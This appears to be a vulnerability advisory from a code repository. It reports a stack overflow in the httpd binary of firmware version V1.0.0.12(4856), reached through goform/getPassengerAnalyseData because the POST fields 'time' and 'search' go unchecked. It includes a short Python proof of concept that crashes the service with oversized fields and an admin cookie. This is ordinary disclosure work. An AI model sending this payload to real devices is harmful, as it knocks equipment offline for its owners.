Skip to content

Latest commit

 

History

History

formGetPassengerAnalyseData

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Overview

Affected version

V1.0.0.12(4856)

Vulnerability details

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formGetPassengerAnalyseData function, which can be accessed via the URL goform/getPassengerAnalyseData

image-20220527170058077

image-20220527170112690

formGetPassengerAnalyseData function gets the POST parameter time and searchand copies to stack buffer without checking its length, causing a stack overflow vulnerability.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"time": b'A'*0x400,
    b"search": b'A'*0x400
}
cookies = {
    b"user": "admin"
}
res = requests.post("http://127.0.0.1/goform/getPassengerAnalyseData", data=data, cookies=cookies)
print(res.content)